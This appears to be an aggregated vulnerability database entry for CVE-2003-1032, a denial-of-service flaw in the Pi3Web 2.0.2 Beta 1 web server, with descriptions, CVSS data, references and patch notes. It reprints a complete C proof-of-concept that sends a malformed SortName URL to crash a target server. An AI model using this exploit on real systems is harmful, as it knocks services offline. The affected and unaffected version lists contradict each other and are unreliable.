CVE-2003-1032
CVSS 5.0
Published: 2004-02-17 00:00:00
Last revised: 2016-10-17 22:39:11

[Original] Pi3Web web server 2.0.2 Beta 1, when the Directory Index is configured to use the "Name" column and sort using the column title as a hyperlink, allows remote attackers to cause a denial of service (crash) via a malformed URL to the web server, possibly involving a buffer overflow.


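[CNNVD] Pi3Web SortName Buffer Overflow Vulnerability (CNNVD-200402-068)

        A vulnerability exists in Pi3Web web server 2.0.2 Beta 1. When the Directory Index is configured to use the "Name" column and to sort using the column title as a hyperlink, a remote attacker can cause a denial of service (crash) via a malformed URL sent to the web server. The vulnerability may involve a buffer overflow.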

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

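- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links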

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1032
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1032
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-068
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=105484265218325&w=2
(UNKNOWN)  BUGTRAQ  20030605 Re: Tripbit Advisory TA-2003-05 Buffer Overflow Vulnerability in Pi3 Web
http://securitytracker.com/id?1006913
(UNKNOWN)  SECTRACK  1006913
http://www.securityfocus.com/bid/7787
(VENDOR_ADVISORY)  BID  7787

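- Vulnerability Information

Pi3Web SortName Buffer Overflow Vulnerability
Medium  Buffer Overflow
2004-02-17 00:00:00 2005-10-20 00:00:00
Remote
        A vulnerability exists in Pi3Web web server 2.0.2 Beta 1. When the Directory Index is configured to use the "Name" column and to sort using the column title as a hyperlink, a remote attacker can cause a denial of service (crash) via a malformed URL sent to the web server. The vulnerability may involve a buffer overflow.

- Advisories and Patches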

        This issue has been addressed in Pi3Web 2.0.2 Beta 2.
        Pi3 Pi3Web 2.0.2 Beta 1
        
        Pi3 Pi3Web 2.0.2
        

- Vulnerability Information (22718)

Pi3Web 2.0.2 SortName Buffer Overflow Vulnerability (EDBID:22718)
windows dos
2003-06-02 Verified
0 posidron
N/A
source: http://www.securityfocus.com/bid/7787/info

Pi3Web is prone to a buffer overflow vulnerability. This is due to insufficient bounds checking of URI parameters. This could be exploited to cause a denial of service or possibly to execute malicious instructions.

This issue was reported for Pi3Web 2.0.2 Beta 1 on Windows platforms. 

/*********************************************************************
*
*     Denial of Service Attack against Pi3 Web Server v2.0.2 05/2003
*
*
*    Tripbit Security Development
*    ----------------------------
*
*    Author: posidron
*
*    Contact
*    [-] Mail: posidron@tripbit.org
*    [-] Web: http://www.tripbit.org
*    [-] Forum: http://www.tripbit.org/wbboard
*       [-] IRC: irc.euirc.net 6667 #tripbit
*
*
*    Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe
*     Special thx: PeaceTreaty (securecrew.net)
*
*********************************************************************/

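#include <stdio.h>
#include <stdlib.h>      /* exit(), atoi() */
#include <string.h>      /* strcpy(), strlen() */
#include <unistd.h>      /* write(), close() */
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <sys/types.h>
#include <sys/socket.h>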

int main(int argc, char *argv[])
{
    int port, sockfd;
    struct sockaddr_in server;
    struct hostent *host;

    char sendstring[1024];

    strcpy(sendstring,"GET /</?SortName=A HTTP/1.0\n\n");

    if(argc < 3)
    {
        printf("Usage: %s [target] <port>\n",argv[0]);
        exit(0);
    }

    port = atoi(argv[2]);

    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
        printf("Connection failed!...\n");
        exit(0);
    }

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr((char*)argv[1]);

    if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
    {
        printf("Can't start socket()!\n");
        exit(0);
    }

    if(connect(sockfd,(struct sockaddr*)&server,sizeof(server)) < 0)
    {
        printf("Can't connect!\n");
        exit(0);
    }

    printf("Dos against Pi3 Web Server v2.0.2\n");

    write(sockfd,sendstring,strlen(sendstring));

    printf("Attack done!...\n");

    close(sockfd);
}
		

- Vulnerability Information

11092
Pi3Web Name Column Sorting Malformed URL DoS
Denial of Service
Loss of Availability

- Vulnerability Description

Unknown or Incomplete

- Timeline

2003-06-02 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Pi3Web SortName Buffer Overflow Vulnerability
Boundary Condition Error 7787
Yes No
2003-06-02 12:00:00 2009-07-11 10:06:00
Discovery is credited to "Rushjo@tripbit.org" <rushjo@tripbit.org>.

- Affected Software Versions

Pi3 Pi3Web 2.0.2 Beta 1
Pi3 Pi3Web 2.0.2
Pi3 Pi3Web 2.0.2 Beta 2
Pi3 Pi3Web 2.0.2 Beta 1

- Unaffected Software Versions

Pi3 Pi3Web 2.0.2 Beta 2
Pi3 Pi3Web 2.0.2 Beta 1

- Discussion

Pi3Web is prone to a buffer overflow vulnerability. This is due to insufficient bounds checking of URI parameters. This could be exploited to cause a denial of service or possibly to execute malicious instructions.

This issue was reported for Pi3Web 2.0.2 Beta 1 on Windows platforms.

- Exploit

The following denial of service proof-of-concept example was submitted:

- Solution

This issue has been addressed in Pi3Web 2.0.2 Beta 2.


Pi3 Pi3Web 2.0.2 Beta 1

Pi3 Pi3Web 2.0.2

- Related References

 

 
